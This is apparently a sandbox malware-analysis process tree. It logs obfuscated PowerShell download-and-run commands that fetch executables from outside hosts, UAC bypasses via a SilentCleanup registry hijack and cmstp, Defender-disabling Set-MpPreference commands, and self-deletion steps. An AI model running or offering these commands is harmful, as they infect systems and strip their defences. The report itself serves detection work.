C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:2440 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 2440 & erase C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe & RD /S /Q C:\\ProgramData\\897638703164392\\* & exit8⤵PID:4152
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 24409⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4188
-
-
-
-
-
C:\Users\Public\omx.exe"C:\Users\Public\omx.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4440 -
C:\Users\Admin\AppData\Local\Temp\WbzfV6CULA.exe"C:\Users\Admin\AppData\Local\Temp\WbzfV6CULA.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4244 -
C:\Users\Admin\AppData\Local\Temp\WbzfV6CULA.exe"C:\Users\Admin\AppData\Local\Temp\WbzfV6CULA.exe"8⤵
- Executes dropped EXE
PID:4972
-
-
-
C:\Users\Admin\AppData\Local\Temp\ys0nsVDvlk.exe"C:\Users\Admin\AppData\Local\Temp\ys0nsVDvlk.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
PID:4724 -
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"8⤵PID:5296
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\XqKMNtso.bat" "9⤵PID:5124
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f10⤵
- Modifies registry key
PID:4320
-
-
C:\Windows\SysWOW64\reg.exereg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "10⤵
- Modifies registry key
PID:1872
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I10⤵PID:1312
-
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f10⤵
- Modifies registry key
PID:2168
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\XqKMNtso.bat" "9⤵PID:3896
-
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"8⤵PID:4812
-
-
-
C:\Users\Admin\AppData\Local\Temp\k7OXQaTnHC.exe"C:\Users\Admin\AppData\Local\Temp\k7OXQaTnHC.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5044 -
C:\Users\Admin\AppData\Local\Temp\k7OXQaTnHC.exe"C:\Users\Admin\AppData\Local\Temp\k7OXQaTnHC.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2180 -
\??\c:\windows\SysWOW64\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\fbsgi511.inf9⤵PID:5028
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\r9bcktZEdK.exe"C:\Users\Admin\AppData\Local\Temp\r9bcktZEdK.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4848 -
C:\Users\Admin\AppData\Local\Temp\r9bcktZEdK.exe"C:\Users\Admin\AppData\Local\Temp\r9bcktZEdK.exe"8⤵
- Executes dropped EXE
PID:4808
-
-
C:\Users\Admin\AppData\Local\Temp\r9bcktZEdK.exe"C:\Users\Admin\AppData\Local\Temp\r9bcktZEdK.exe"8⤵
- Executes dropped EXE
- Windows security modification
PID:4872 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose9⤵
- Suspicious use of AdjustPrivilegeToken
PID:1156
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\omx.exe"7⤵PID:4496
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
PID:4948
-
-
-
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8487.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3612
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
PID:2012
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8487.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Users\Public\xvb.exe"C:\Users\Public\xvb.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4132 -
C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe"C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4412 -
C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe"C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5372 -
C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe"{path}"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:1028 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 1028 & erase C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe & RD /S /Q C:\\ProgramData\\919755189621101\\* & exit9⤵PID:2420
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 102810⤵
- Kills process with taskkill
PID:5440
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe"{path}"7⤵
- Executes dropped EXE
PID:3736
-
-
-
C:\Users\Public\xvb.exe"{path}"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
PID:4204 -
C:\Users\Admin\AppData\Local\Temp\owIRnLSEZY.exe"C:\Users\Admin\AppData\Local\Temp\owIRnLSEZY.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6116 -
C:\Users\Admin\AppData\Local\Temp\owIRnLSEZY.exe"C:\Users\Admin\AppData\Local\Temp\owIRnLSEZY.exe"8⤵
- Executes dropped EXE
PID:5832
-
-
-
C:\Users\Admin\AppData\Local\Temp\tr1M5TzQok.exe"C:\Users\Admin\AppData\Local\Temp\tr1M5TzQok.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5668 -
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"8⤵PID:2536
-
-
-
C:\Users\Admin\AppData\Local\Temp\ZipHA1oS1L.exe"C:\Users\Admin\AppData\Local\Temp\ZipHA1oS1L.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2616 -
C:\Users\Admin\AppData\Local\Temp\ZipHA1oS1L.exe"C:\Users\Admin\AppData\Local\Temp\ZipHA1oS1L.exe"8⤵
- Executes dropped EXE
PID:4304
-
-
C:\Users\Admin\AppData\Local\Temp\ZipHA1oS1L.exe"C:\Users\Admin\AppData\Local\Temp\ZipHA1oS1L.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3976 -
\??\c:\windows\SysWOW64\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\pcidrymb.inf9⤵PID:4844
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\viu1oJ97BK.exe"C:\Users\Admin\AppData\Local\Temp\viu1oJ97BK.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5496 -
C:\Users\Admin\AppData\Local\Temp\viu1oJ97BK.exe"C:\Users\Admin\AppData\Local\Temp\viu1oJ97BK.exe"8⤵
- Executes dropped EXE
PID:4160
-
-
C:\Users\Admin\AppData\Local\Temp\viu1oJ97BK.exe"C:\Users\Admin\AppData\Local\Temp\viu1oJ97BK.exe"8⤵
- Executes dropped EXE
- Windows security modification
PID:5476 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose9⤵PID:6024
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\xvb.exe"7⤵PID:5548
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
PID:4264
-
-
-
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8487.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:3960 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4104
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
PID:2468
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8487.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4536 -
C:\Users\Public\ywq.exe"C:\Users\Public\ywq.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4824 -
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:5080 -
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5052
-
-
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8487.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4736
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵PID:3892
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Windows\temp\mmfwhmpi.exe2⤵PID:2044
-
C:\Windows\temp\mmfwhmpi.exeC:\Windows\temp\mmfwhmpi.exe3⤵
- Executes dropped EXE
PID:1872 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5112
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true4⤵
- Suspicious use of AdjustPrivilegeToken
PID:984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 64⤵
- Suspicious use of AdjustPrivilegeToken
PID:4312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 64⤵
- Suspicious use of AdjustPrivilegeToken
PID:4220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 64⤵
- Suspicious use of AdjustPrivilegeToken
PID:4924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 24⤵
- Suspicious use of AdjustPrivilegeToken
PID:4092
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cmstp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4344
-
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Windows\temp\ipjk2yso.exe2⤵PID:4312
-
C:\Windows\temp\ipjk2yso.exeC:\Windows\temp\ipjk2yso.exe3⤵
- Executes dropped EXE
PID:4836 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵PID:5224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true4⤵PID:5660
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true4⤵PID:2792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true4⤵PID:5836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true4⤵PID:2404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true4⤵PID:4348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force4⤵PID:3920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 64⤵PID:4360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 04⤵PID:4660
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 64⤵PID:5688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 64⤵PID:4640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true4⤵PID:6132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 24⤵PID:4036
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cmstp.exe /F2⤵
- Kills process with taskkill
PID:5012
-